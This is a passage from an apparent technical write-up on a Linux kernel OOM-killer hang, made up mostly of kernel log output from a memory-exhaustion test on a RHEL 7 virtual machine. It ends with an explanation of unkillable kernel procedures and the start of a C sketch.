yes [ 78.883294] lowmem_reserve[]: 0 0 0 0 [ 78.884105] Node 0 DMA: 62*4kB (M) 43*8kB (UM) 32*16kB (M) 20*32kB (M) 11*64kB (M) 6*128kB (UM) 3*256kB (UM) 3*512kB (UM) 0*1024kB 1*2048kB (R) 0*4096kB = 7568kB [ 78.887411] Node 0 DMA32: 1975*4kB (UEM) 1278*8kB (UEM) 550*16kB (UEM) 302*32kB (UEM) 61*64kB (UEM) 0*128kB 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 44588kB [ 78.890582] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 78.892105] 2425 total pagecache pages [ 78.892799] 0 pages in swap cache [ 78.893421] Swap cache stats: add 0, delete 0, find 0/0 [ 78.894381] Free swap = 0kB [ 78.894915] Total swap = 0kB [ 78.898329] 524287 pages RAM [ 78.898950] 54799 pages reserved [ 78.899634] 527290 pages shared [ 78.900229] 453223 pages non-shared [ 78.900886] [ pid ] uid tgid total_vm rss nr_ptes swapents oom_score_adj name [ 78.902341] [ 574] 0 574 9231 503 19 0 0 systemd-journal [ 78.903948] [ 590] 0 590 29620 80 26 0 0 lvmetad [ 78.905430] [ 612] 0 612 10995 330 21 0 -1000 systemd-udevd [ 78.907001] [ 704] 0 704 12797 95 23 0 -1000 auditd [ 78.908463] [ 717] 0 717 20056 28 9 0 0 audispd [ 78.909981] [ 726] 0 726 4189 43 13 0 0 alsactl [ 78.911463] [ 728] 0 728 52615 443 55 0 0 abrtd [ 78.912905] [ 729] 0 729 6600 78 17 0 0 systemd-logind [ 78.914821] [ 730] 0 730 1094 25 8 0 0 rngd [ 78.916266] [ 732] 0 732 6551 49 19 0 0 sedispatch [ 78.917787] [ 733] 0 733 32515 129 19 0 0 smartd [ 78.919252] [ 736] 81 736 7419 337 18 0 -900 dbus-daemon [ 78.920801] [ 740] 0 740 51993 341 53 0 0 abrt-watch-log [ 78.922388] [ 745] 995 745 2133 37 9 0 0 lsmd [ 78.923820] [ 748] 0 748 4829 79 12 0 0 irqbalance [ 78.925388] [ 750] 0 750 51993 340 51 0 0 abrt-watch-log [ 78.926943] [ 757] 0 757 80894 4240 75 0 0 firewalld [ 78.928443] [ 762] 0 762 61592 381 63 0 0 vmtoolsd [ 78.929964] [ 763] 0 763 84088 285 64 0 0 ModemManager [ 78.931487] [ 770] 172 770 41164 50 16 0 0 rtkit-daemon [ 78.933007] [ 773] 0 773 96845 198 42 0 0 accounts-daemon [ 78.934618] [ 780] 0 780 54939 449 38 0 0 rsyslogd [ 78.936113] [ 781] 70 781 7549 75 21 0 0 avahi-daemon [ 78.937696] [ 783] 994 783 28961 93 27 0 0 chronyd [ 78.939164] [ 786] 0 786 50842 115 39 0 0 gssproxy [ 78.940651] [ 794] 0 794 28812 62 11 0 0 ksmtuned [ 78.942134] [ 796] 32 796 16227 131 33 0 0 rpcbind [ 78.943603] [ 806] 70 806 7518 59 19 0 0 avahi-daemon [ 78.945148] [ 818] 999 818 132797 2567 53 0 0 polkitd [ 78.946618] [ 882] 0 882 113615 480 72 0 0 NetworkManager [ 78.948203] [ 1010] 0 1010 13266 145 29 0 0 wpa_supplicant [ 78.949779] [ 1200] 0 1200 27631 3114 54 0 0 dhclient [ 78.951271] [ 1410] 0 1410 20640 213 44 0 -1000 sshd [ 78.952692] [ 1413] 0 1413 138261 2651 86 0 0 tuned [ 78.954129] [ 1416] 0 1416 138875 1130 139 0 0 libvirtd [ 78.955621] [ 1424] 0 1424 31583 151 17 0 0 crond [ 78.957092] [ 1425] 0 1425 118308 753 50 0 0 gdm [ 78.958480] [ 1456] 0 1456 6491 49 17 0 0 atd [ 78.959869] [ 1462] 0 1462 27509 33 11 0 0 agetty [ 78.961291] [ 2488] 0 2488 55958 1573 97 0 0 Xorg [ 78.962720] [ 2575] 0 2575 23306 254 44 0 0 master [ 78.964156] [ 2576] 89 2576 23332 251 46 0 0 pickup [ 78.965583] [ 2577] 89 2577 23349 252 46 0 0 qmgr [ 78.967190] [ 2583] 0 2583 64751 482 57 0 -900 abrt-dbus [ 78.968691] [ 2705] 99 2705 3888 48 11 0 0 dnsmasq [ 78.970167] [ 2706] 0 2706 3881 45 11 0 0 dnsmasq [ 78.971646] [ 2712] 0 2712 89025 249 61 0 0 gdm-session-wor [ 78.973250] [ 2715] 42 2715 140687 403 102 0 0 gnome-session [ 78.974809] [ 2718] 42 2718 3488 36 11 0 0 dbus-launch [ 78.976354] [ 2719] 42 2719 7342 186 17 0 0 
dbus-daemon [ 78.977884] [ 2722] 42 2722 85002 155 34 0 0 at-spi-bus-laun [ 78.979483] [ 2728] 42 2728 7168 89 19 0 0 dbus-daemon [ 78.981023] [ 2731] 42 2731 32423 158 34 0 0 at-spi2-registr [ 78.982629] [ 2743] 42 2743 272885 1577 182 0 0 gnome-settings- [ 78.984229] [ 2750] 0 2750 90874 321 61 0 0 upowerd [ 78.985703] [ 2754] 42 2754 76643 143 37 0 0 gvfsd [ 78.987663] [ 2758] 42 2758 73901 174 42 0 0 gvfsd-fuse [ 78.989159] [ 2770] 42 2770 387894 17240 291 0 0 gnome-shell [ 78.990669] [ 2771] 997 2771 101041 373 50 0 0 colord [ 78.992139] [ 2780] 42 2780 111507 295 75 0 0 pulseaudio [ 78.993661] [ 2801] 42 2801 45167 108 25 0 0 dconf-service [ 78.995198] [ 2806] 42 2806 117500 533 47 0 0 ibus-daemon [ 78.996834] [ 2811] 42 2811 98221 686 46 0 0 ibus-dconf [ 78.998353] [ 2813] 42 2813 117506 551 113 0 0 ibus-x11 [ 78.999851] [ 2820] 42 2820 98935 402 61 0 0 mission-control [ 79.001442] [ 2822] 42 2822 143741 459 94 0 0 caribou [ 79.002912] [ 2826] 0 2826 101278 258 52 0 0 packagekitd [ 79.006211] [ 2832] 42 2832 178354 1594 141 0 0 goa-daemon [ 79.007731] [ 2867] 42 2867 100148 250 47 0 0 gvfs-udisks2-vo [ 79.009329] [ 2871] 0 2871 92703 782 44 0 0 udisksd [ 79.010795] [ 2878] 42 2878 83626 371 91 0 0 goa-identity-se [ 79.012404] [ 2889] 42 2889 105443 307 58 0 0 gvfs-afc-volume [ 79.014295] [ 2894] 42 2894 78121 168 38 0 0 gvfs-mtp-volume [ 79.015865] [ 2898] 42 2898 74934 137 33 0 0 gvfs-goa-volume [ 79.017473] [ 2902] 42 2902 80390 182 43 0 0 gvfs-gphoto2-vo [ 79.019042] [ 2914] 0 2914 80155 236 57 0 -900 realmd [ 79.020472] [ 2922] 42 2922 79800 679 42 0 0 ibus-engine-sim [ 79.022074] [ 2976] 0 2976 36375 328 73 0 0 sshd [ 79.023483] [ 2980] 1000 2980 36408 326 70 0 0 sshd [ 79.024879] [ 2982] 1000 2982 29142 391 14 0 0 bash [ 79.026277] [ 3075] 0 3075 26974 23 10 0 0 sleep [ 79.027729] [ 3077] 1000 3077 1042 20 7 0 1 pipe-memeater2 [ 79.029291] [ 3078] 1000 3078 1042 20 7 0 1 pipe-memeater2 [ 79.030897] [ 3079] 1000 3079 1042 20 7 0 1 pipe-memeater2 [ 79.032489] [ 3080] 1000 3080 1042 20 7 0 1 pipe-memeater2 [ 79.034042] [ 3081] 1000 3081 1042 20 7 0 1 pipe-memeater2 [ 79.035603] [ 3082] 1000 3082 1042 20 7 0 1 pipe-memeater2 [ 79.037158] [ 3083] 1000 3083 1042 20 7 0 1 pipe-memeater2 [ 79.038752] [ 3084] 1000 3084 1042 20 7 0 1 pipe-memeater2 [ 79.040301] [ 3085] 1000 3085 1042 20 7 0 1 pipe-memeater2 [ 79.041855] [ 3086] 1000 3086 1042 20 7 0 1 pipe-memeater2 [ 79.043438] [ 3088] 1000 3088 1042 20 7 0 0 pipe-memeater2 [ 79.045025] Out of memory: Kill process 2770 (gnome-shell) score 37 or sacrifice child [ 79.046466] Killed process 2806 (ibus-daemon) total-vm:470000kB, anon-rss:2128kB, file-rss:4kB (Omitting repetitions) [ 119.938777] pipe-memeater2 invoked oom-killer: gfp_mask=0x200d2, order=0, oom_score_adj=0 [ 119.940307] pipe-memeater2 cpuset=/ mems_allowed=0 [ 119.941199] CPU: 0 PID: 3088 Comm: pipe-memeater2 Not tainted 3.10.0-123.el7.x86_64 #1 [ 119.942645] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 119.944575] ffff88005f302d80 000000005d69c4df ffff88005f3ada78 ffffffff815e19ba [ 119.946897] ffff88005f3adb08 ffffffff815dd02d ffffffff810b68f8 ffff8800666dde50 [ 119.948528] 0000000000000202 ffff88005f302d80 ffff88005f3adaf0 ffffffff81102eff [ 119.949989] Call Trace: [ 119.950466] [<ffffffff815e19ba>] dump_stack+0x19/0x1b [ 119.951424] [<ffffffff815dd02d>] dump_header+0x8e/0x214 [ 119.952398] [<ffffffff810b68f8>] ? ktime_get_ts+0x48/0xe0 [ 119.953413] [<ffffffff81102eff>] ? 
delayacct_end+0x8f/0xb0 [ 119.954435] [<ffffffff8114520e>] oom_kill_process+0x24e/0x3b0 [ 119.955514] [<ffffffff81144d76>] ? find_lock_task_mm+0x56/0xc0 [ 119.956799] [<ffffffff8106af3e>] ? has_capability_noaudit+0x1e/0x30 [ 119.957985] [<ffffffff81145a36>] out_of_memory+0x4b6/0x4f0 [ 119.958997] [<ffffffff8114b579>] __alloc_pages_nodemask+0xa09/0xb10 [ 119.960145] [<ffffffff81188779>] alloc_pages_current+0xa9/0x170 [ 119.961223] [<ffffffff811b8954>] pipe_write+0x274/0x540 [ 119.962186] [<ffffffff811af36d>] do_sync_write+0x8d/0xd0 [ 119.963159] [<ffffffff811afb0d>] vfs_write+0xbd/0x1e0 [ 119.964094] [<ffffffff811b0558>] SyS_write+0x58/0xb0 [ 119.965014] [<ffffffff815f2119>] system_call_fastpath+0x16/0x1b [ 119.966102] Mem-Info: [ 119.966528] Node 0 DMA per-cpu: [ 119.967138] CPU 0: hi: 0, btch: 1 usd: 0 [ 119.968216] CPU 1: hi: 0, btch: 1 usd: 0 [ 119.969247] CPU 2: hi: 0, btch: 1 usd: 0 [ 119.970408] CPU 3: hi: 0, btch: 1 usd: 0 [ 119.971436] Node 0 DMA32 per-cpu: [ 119.972147] CPU 0: hi: 186, btch: 31 usd: 0 [ 119.973018] CPU 1: hi: 186, btch: 31 usd: 30 [ 119.973883] CPU 2: hi: 186, btch: 31 usd: 41 [ 119.974748] CPU 3: hi: 186, btch: 31 usd: 22 [ 119.975626] active_anon:3798 inactive_anon:1649 isolated_anon:0 [ 119.975626] active_file:4 inactive_file:198 isolated_file:0 [ 119.975626] unevictable:0 dirty:0 writeback:0 unstable:0 [ 119.975626] free:13047 slab_reclaimable:4692 slab_unreclaimable:7148 [ 119.975626] mapped:0 shmem:2260 pagetables:530 bounce:0 [ 119.975626] free_cma:0 [ 119.981153] Node 0 DMA free:7632kB min:384kB low:480kB high:576kB active_anon:128kB inactive_anon:104kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:124kB slab_reclaimable:152kB slab_unreclaimable:356kB kernel_stack:0kB pagetables:8kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 119.988478] lowmem_reserve[]: 0 1802 1802 1802 [ 119.989412] Node 0 DMA32 free:44612kB min:44668kB low:55832kB high:67000kB active_anon:15064kB inactive_anon:6492kB active_file:16kB inactive_file:376kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1845300kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:8916kB slab_reclaimable:18616kB slab_unreclaimable:28236kB kernel_stack:3608kB pagetables:2112kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:223 all_unreclaimable? 
yes [ 119.996991] lowmem_reserve[]: 0 0 0 0 [ 119.997797] Node 0 DMA: 2*4kB (UM) 8*8kB (UM) 10*16kB (M) 11*32kB (UM) 11*64kB (UM) 11*128kB (UM) 5*256kB (UM) 1*512kB (U) 1*1024kB (M) 1*2048kB (R) 0*4096kB = 7560kB [ 120.002259] Node 0 DMA32: 1143*4kB (EM) 966*8kB (UEM) 491*16kB (EM) 345*32kB (UEM) 102*64kB (EM) 23*128kB (UM) 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 44764kB [ 120.007208] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 120.008837] 2506 total pagecache pages [ 120.009721] 0 pages in swap cache [ 120.010395] Swap cache stats: add 0, delete 0, find 0/0 [ 120.011755] Free swap = 0kB [ 120.012363] Total swap = 0kB [ 120.016138] 524287 pages RAM [ 120.016878] 54799 pages reserved [ 120.017911] 525985 pages shared [ 120.018652] 454436 pages non-shared [ 120.019391] [ pid ] uid tgid total_vm rss nr_ptes swapents oom_score_adj name [ 120.021231] [ 590] 0 590 29620 80 26 0 0 lvmetad [ 120.023399] [ 612] 0 612 10995 330 21 0 -1000 systemd-udevd [ 120.025409] [ 704] 0 704 12797 95 23 0 -1000 auditd [ 120.027072] [ 717] 0 717 20056 28 9 0 0 audispd [ 120.029071] [ 726] 0 726 4189 43 13 0 0 alsactl [ 120.031114] [ 729] 0 729 6600 80 17 0 0 systemd-logind [ 120.032827] [ 730] 0 730 1094 25 8 0 0 rngd [ 120.034420] [ 732] 0 732 6551 49 19 0 0 sedispatch [ 120.036194] [ 736] 81 736 7419 337 18 0 -900 dbus-daemon [ 120.037949] [ 745] 995 745 2133 37 9 0 0 lsmd [ 120.039411] [ 748] 0 748 4829 78 12 0 0 irqbalance [ 120.041107] [ 770] 172 770 41164 53 16 0 0 rtkit-daemon [ 120.042884] [ 781] 70 781 7549 76 21 0 0 avahi-daemon [ 120.045308] [ 794] 0 794 28812 62 11 0 0 ksmtuned [ 120.047005] [ 806] 70 806 7518 59 19 0 0 avahi-daemon [ 120.048535] [ 1410] 0 1410 20640 213 44 0 -1000 sshd [ 120.049944] [ 1456] 0 1456 6491 49 17 0 0 atd [ 120.051333] [ 1462] 0 1462 27509 33 11 0 0 agetty [ 120.052764] [ 2583] 0 2583 64751 493 57 0 -900 abrt-dbus [ 120.054299] [ 2705] 99 2705 3888 47 11 0 0 dnsmasq [ 120.056124] [ 2706] 0 2706 3881 45 11 0 0 dnsmasq [ 120.057652] [ 2914] 0 2914 80155 255 57 0 -900 realmd [ 120.059087] [ 3075] 0 3075 26974 23 10 0 0 sleep [ 120.060508] [ 3088] 1000 3088 1042 20 7 0 0 pipe-memeater2 [ 120.062067] [ 3089] 0 3089 2732 32 9 0 0 systemd-cgroups [ 120.063637] [ 3090] 0 3090 19084 33 10 0 0 systemd-cgroups [ 120.065210] [ 3091] 0 3091 19084 33 9 0 0 systemd-cgroups [ 120.066939] [ 3092] 0 3092 2719 27 9 0 0 systemd-cgroups [ 120.069145] Out of memory: Kill process 590 (lvmetad) score 0 or sacrifice child [ 120.071126] Killed process 590 (lvmetad) total-vm:118480kB, anon-rss:320kB, file-rss:0kB ( I pressed SysRq-m in order to display memory information, for the system was still not responding. 
) [ 209.378474] SysRq : Show Memory [ 209.379117] Mem-Info: [ 209.379560] Node 0 DMA per-cpu: [ 209.380184] CPU 0: hi: 0, btch: 1 usd: 0 [ 209.381073] CPU 1: hi: 0, btch: 1 usd: 0 [ 209.381968] CPU 2: hi: 0, btch: 1 usd: 0 [ 209.382852] CPU 3: hi: 0, btch: 1 usd: 0 [ 209.383736] Node 0 DMA32 per-cpu: [ 209.384383] CPU 0: hi: 186, btch: 31 usd: 91 [ 209.385281] CPU 1: hi: 186, btch: 31 usd: 53 [ 209.386171] CPU 2: hi: 186, btch: 31 usd: 92 [ 209.387054] CPU 3: hi: 186, btch: 31 usd: 138 [ 209.387947] active_anon:3716 inactive_anon:1649 isolated_anon:0 [ 209.387947] active_file:28 inactive_file:8 isolated_file:0 [ 209.387947] unevictable:0 dirty:0 writeback:0 unstable:0 [ 209.387947] free:12757 slab_reclaimable:4692 slab_unreclaimable:7146 [ 209.387947] mapped:68 shmem:2260 pagetables:504 bounce:0 [ 209.387947] free_cma:0 [ 209.393582] Node 0 DMA free:7592kB min:384kB low:480kB high:576kB active_anon:128kB inactive_anon:104kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:124kB slab_reclaimable:152kB slab_unreclaimable:356kB kernel_stack:0kB pagetables:8kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 209.400851] lowmem_reserve[]: 0 1802 1802 1802 [ 209.401815] Node 0 DMA32 free:43436kB min:44668kB low:55832kB high:67000kB active_anon:14736kB inactive_anon:6492kB active_file:112kB inactive_file:32kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1845300kB mlocked:0kB dirty:0kB writeback:0kB mapped:272kB shmem:8916kB slab_reclaimable:18616kB slab_unreclaimable:28228kB kernel_stack:3608kB pagetables:2008kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:824 all_unreclaimable? yes [ 209.409563] lowmem_reserve[]: 0 0 0 0 [ 209.410386] Node 0 DMA: 16*4kB (M) 13*8kB (UM) 10*16kB (M) 11*32kB (UM) 10*64kB (UM) 11*128kB (UM) 5*256kB (UM) 1*512kB (U) 1*1024kB (M) 1*2048kB (R) 0*4096kB = 7592kB [ 209.413721] Node 0 DMA32: 1009*4kB (EM) 937*8kB (EM) 476*16kB (UEM) 345*32kB (UEM) 103*64kB (UEM) 20*128kB (UM) 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 43436kB [ 209.416997] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 209.418540] 2312 total pagecache pages [ 209.419241] 0 pages in swap cache [ 209.419859] Swap cache stats: add 0, delete 0, find 0/0 [ 209.420824] Free swap = 0kB [ 209.421370] Total swap = 0kB [ 209.424943] 524287 pages RAM [ 209.425506] 54799 pages reserved [ 209.426111] 525960 pages shared [ 209.426705] 454446 pages non-shared ( I pressed SysRq-m in order to display memory information, for the system was still not responding. 
) [ 279.574636] SysRq : Show Memory [ 279.575281] Mem-Info: [ 279.575727] Node 0 DMA per-cpu: [ 279.576351] CPU 0: hi: 0, btch: 1 usd: 0 [ 279.577240] CPU 1: hi: 0, btch: 1 usd: 0 [ 279.578135] CPU 2: hi: 0, btch: 1 usd: 0 [ 279.579025] CPU 3: hi: 0, btch: 1 usd: 0 [ 279.579911] Node 0 DMA32 per-cpu: [ 279.580559] CPU 0: hi: 186, btch: 31 usd: 91 [ 279.581454] CPU 1: hi: 186, btch: 31 usd: 53 [ 279.582342] CPU 2: hi: 186, btch: 31 usd: 92 [ 279.583229] CPU 3: hi: 186, btch: 31 usd: 138 [ 279.584119] active_anon:3716 inactive_anon:1649 isolated_anon:0 [ 279.584119] active_file:28 inactive_file:8 isolated_file:0 [ 279.584119] unevictable:0 dirty:0 writeback:0 unstable:0 [ 279.584119] free:12757 slab_reclaimable:4692 slab_unreclaimable:7146 [ 279.584119] mapped:68 shmem:2260 pagetables:504 bounce:0 [ 279.584119] free_cma:0 [ 279.589776] Node 0 DMA free:7592kB min:384kB low:480kB high:576kB active_anon:128kB inactive_anon:104kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:124kB slab_reclaimable:152kB slab_unreclaimable:356kB kernel_stack:0kB pagetables:8kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 279.597050] lowmem_reserve[]: 0 1802 1802 1802 [ 279.598024] Node 0 DMA32 free:43436kB min:44668kB low:55832kB high:67000kB active_anon:14736kB inactive_anon:6492kB active_file:112kB inactive_file:32kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1845300kB mlocked:0kB dirty:0kB writeback:0kB mapped:272kB shmem:8916kB slab_reclaimable:18616kB slab_unreclaimable:28228kB kernel_stack:3608kB pagetables:2008kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:824 all_unreclaimable? yes [ 279.605826] lowmem_reserve[]: 0 0 0 0 [ 279.606659] Node 0 DMA: 16*4kB (M) 13*8kB (UM) 10*16kB (M) 11*32kB (UM) 10*64kB (UM) 11*128kB (UM) 5*256kB (UM) 1*512kB (U) 1*1024kB (M) 1*2048kB (R) 0*4096kB = 7592kB [ 279.610016] Node 0 DMA32: 1009*4kB (EM) 937*8kB (EM) 476*16kB (UEM) 345*32kB (UEM) 103*64kB (UEM) 20*128kB (UM) 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 43436kB [ 279.613298] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 279.614840] 2312 total pagecache pages [ 279.615539] 0 pages in swap cache [ 279.616166] Swap cache stats: add 0, delete 0, find 0/0 [ 279.617134] Free swap = 0kB [ 279.617676] Total swap = 0kB [ 279.621228] 524287 pages RAM [ 279.622185] 54799 pages reserved [ 279.622791] 525928 pages shared [ 279.623369] 454446 pages non-shared ( I pressed SysRq-f in order to invoke OOM killer, for OOM killer is not invoked automatically despite DMA32's free: is already below min: watermark. ) [ 297.411498] SysRq : Manual OOM execution [ 297.412450] kworker/0:2 invoked oom-killer: gfp_mask=0xd0, order=0, oom_score_adj=0 [ 297.413837] kworker/0:2 cpuset=/ mems_allowed=0 [ 297.414701] CPU: 0 PID: 297 Comm: kworker/0:2 Not tainted 3.10.0-123.el7.x86_64 #1 [ 297.416070] Hardware name: VMware, Inc. 
VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/31/2013 [ 297.418031] Workqueue: events moom_callback [ 297.418817] ffff880036ebc440 00000000d84a44d3 ffff880036a3fc70 ffffffff815e19ba [ 297.420273] ffff880036a3fd00 ffffffff815dd02d ffff880036a3fe04 ffff880036a407d0 [ 297.421755] ffff88003689c000 0000000000000004 ffff880036a3fcc8 0000000200000000 [ 297.423197] Call Trace: [ 297.423670] [<ffffffff815e19ba>] dump_stack+0x19/0x1b [ 297.424601] [<ffffffff815dd02d>] dump_header+0x8e/0x214 [ 297.425571] [<ffffffff8114520e>] oom_kill_process+0x24e/0x3b0 [ 297.426639] [<ffffffff81144d76>] ? find_lock_task_mm+0x56/0xc0 [ 297.427744] [<ffffffff8106af3e>] ? has_capability_noaudit+0x1e/0x30 [ 297.428889] [<ffffffff81145a36>] out_of_memory+0x4b6/0x4f0 [ 297.429921] [<ffffffff8137bc3d>] moom_callback+0x4d/0x50 [ 297.430904] [<ffffffff8107e02b>] process_one_work+0x17b/0x460 [ 297.431989] [<ffffffff8107edfb>] worker_thread+0x11b/0x400 [ 297.433040] [<ffffffff8107ece0>] ? rescuer_thread+0x400/0x400 [ 297.434092] [<ffffffff81085aef>] kthread+0xcf/0xe0 [ 297.434981] [<ffffffff81085a20>] ? kthread_create_on_node+0x140/0x140 [ 297.436168] [<ffffffff815f206c>] ret_from_fork+0x7c/0xb0 [ 297.437257] [<ffffffff81085a20>] ? kthread_create_on_node+0x140/0x140 [ 297.438461] Mem-Info: [ 297.438896] Node 0 DMA per-cpu: [ 297.439510] CPU 0: hi: 0, btch: 1 usd: 0 [ 297.440405] CPU 1: hi: 0, btch: 1 usd: 0 [ 297.441288] CPU 2: hi: 0, btch: 1 usd: 0 [ 297.442171] CPU 3: hi: 0, btch: 1 usd: 0 [ 297.443056] Node 0 DMA32 per-cpu: [ 297.443701] CPU 0: hi: 186, btch: 31 usd: 91 [ 297.444590] CPU 1: hi: 186, btch: 31 usd: 53 [ 297.445473] CPU 2: hi: 186, btch: 31 usd: 92 [ 297.446358] CPU 3: hi: 186, btch: 31 usd: 138 [ 297.447242] active_anon:3716 inactive_anon:1649 isolated_anon:0 [ 297.447242] active_file:28 inactive_file:8 isolated_file:0 [ 297.447242] unevictable:0 dirty:0 writeback:0 unstable:0 [ 297.447242] free:12757 slab_reclaimable:4692 slab_unreclaimable:7146 [ 297.447242] mapped:68 shmem:2260 pagetables:504 bounce:0 [ 297.447242] free_cma:0 [ 297.453048] Node 0 DMA free:7592kB min:384kB low:480kB high:576kB active_anon:128kB inactive_anon:104kB active_file:0kB inactive_file:0kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:15988kB managed:15904kB mlocked:0kB dirty:0kB writeback:0kB mapped:0kB shmem:124kB slab_reclaimable:152kB slab_unreclaimable:356kB kernel_stack:0kB pagetables:8kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:0 all_unreclaimable? yes [ 297.460221] lowmem_reserve[]: 0 1802 1802 1802 [ 297.461163] Node 0 DMA32 free:43436kB min:44668kB low:55832kB high:67000kB active_anon:14736kB inactive_anon:6492kB active_file:112kB inactive_file:32kB unevictable:0kB isolated(anon):0kB isolated(file):0kB present:2080640kB managed:1845300kB mlocked:0kB dirty:0kB writeback:0kB mapped:272kB shmem:8916kB slab_reclaimable:18616kB slab_unreclaimable:28228kB kernel_stack:3608kB pagetables:2008kB unstable:0kB bounce:0kB free_cma:0kB writeback_tmp:0kB pages_scanned:824 all_unreclaimable? 
yes [ 297.469732] lowmem_reserve[]: 0 0 0 0 [ 297.470565] Node 0 DMA: 16*4kB (M) 13*8kB (UM) 10*16kB (M) 11*32kB (UM) 10*64kB (UM) 11*128kB (UM) 5*256kB (UM) 1*512kB (U) 1*1024kB (M) 1*2048kB (R) 0*4096kB = 7592kB [ 297.473931] Node 0 DMA32: 1009*4kB (EM) 937*8kB (EM) 476*16kB (UEM) 345*32kB (UEM) 103*64kB (UEM) 20*128kB (UM) 0*256kB 0*512kB 0*1024kB 0*2048kB 1*4096kB (R) = 43436kB [ 297.477216] Node 0 hugepages_total=0 hugepages_free=0 hugepages_surp=0 hugepages_size=2048kB [ 297.478752] 2312 total pagecache pages [ 297.479453] 0 pages in swap cache [ 297.480080] Swap cache stats: add 0, delete 0, find 0/0 [ 297.481058] Free swap = 0kB [ 297.481596] Total swap = 0kB [ 297.485061] 524287 pages RAM [ 297.485624] 54799 pages reserved [ 297.486234] 525928 pages shared [ 297.486826] 454446 pages non-shared [ 297.487486] [ pid ] uid tgid total_vm rss nr_ptes swapents oom_score_adj name [ 297.488954] [ 612] 0 612 10995 330 21 0 -1000 systemd-udevd [ 297.490531] [ 704] 0 704 12797 95 23 0 -1000 auditd [ 297.492002] [ 717] 0 717 20056 69 9 0 0 audispd [ 297.493481] [ 726] 0 726 4189 43 13 0 0 alsactl [ 297.494963] [ 729] 0 729 6600 77 17 0 0 systemd-logind [ 297.496545] [ 730] 0 730 1094 25 8 0 0 rngd [ 297.497986] [ 732] 0 732 6551 49 19 0 0 sedispatch [ 297.499506] [ 736] 81 736 7419 337 18 0 -900 dbus-daemon [ 297.501759] [ 745] 995 745 2133 37 9 0 0 lsmd [ 297.503207] [ 748] 0 748 4829 78 12 0 0 irqbalance [ 297.504741] [ 770] 172 770 41164 56 16 0 0 rtkit-daemon [ 297.506298] [ 781] 70 781 7549 76 21 0 0 avahi-daemon [ 297.507855] [ 794] 0 794 28812 62 11 0 0 ksmtuned [ 297.509361] [ 806] 70 806 7518 59 19 0 0 avahi-daemon [ 297.510917] [ 1410] 0 1410 20640 213 44 0 -1000 sshd [ 297.512358] [ 1456] 0 1456 6491 49 17 0 0 atd [ 297.513797] [ 1462] 0 1462 27509 33 11 0 0 agetty [ 297.515266] [ 2583] 0 2583 64751 493 57 0 -900 abrt-dbus [ 297.516777] [ 2705] 99 2705 3888 47 11 0 0 dnsmasq [ 297.518255] [ 2706] 0 2706 3881 45 11 0 0 dnsmasq [ 297.519756] [ 2914] 0 2914 80155 255 57 0 -900 realmd [ 297.521218] [ 3075] 0 3075 26974 23 10 0 0 sleep [ 297.522669] [ 3088] 1000 3088 1042 20 7 0 0 pipe-memeater2 [ 297.524263] [ 3089] 0 3089 2732 32 9 0 0 systemd-cgroups [ 297.525861] [ 3090] 0 3090 19084 33 10 0 0 systemd-cgroups [ 297.527466] [ 3091] 0 3091 19084 33 9 0 0 systemd-cgroups [ 297.529070] [ 3092] 0 3092 2719 27 9 0 0 systemd-cgroups [ 297.530666] Out of memory: Kill process 781 (avahi-daemon) score 0 or sacrifice child [ 297.532093] Killed process 806 (avahi-daemon) total-vm:30072kB, anon-rss:236kB, file-rss:0kB ---------- Example output of a hang up after OOM killer is invoked end ----------
At first, I suspected that this was a systemd-related problem. But it turned out that this problem tends to occur when using xfs.
I write "SIGKILL signal cannot be ignored" at OOM killer. But to tell the truth, there are many "procedures which cannot be interrupted when SIGKILL signal is delivered" in the kernel. This is because that since the kernel is a program which controls resources between programs running in userspace and hardware, interrupting as soon as receiving SIGKILL signal can result in inconsistent state.
In order to avoid such inconsistent states, the kernel contains many (unkillable) procedures which cannot be interrupted when a SIGKILL signal is delivered. But in fact, it also contains many procedures which are essentially killable (they could safely be interrupted when SIGKILL is delivered) yet remain unkillable, simply because omitting the error handling keeps the code simpler.
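The following is a minimal sketch of mine (not actual kernel source) contrasting the two styles. mutex_lock() and mutex_lock_killable() are real in-kernel APIs; my_lock and the two functions are hypothetical:
---------- killable-vs-unkillable.c (sketch) ----------
#include <linux/mutex.h>
#include <linux/errno.h>

static DEFINE_MUTEX(my_lock);

/* Unkillable: SIGKILL is never checked while waiting. Simple, because
 * no error path exists. */
static void do_work_unkillable(void)
{
	mutex_lock(&my_lock);
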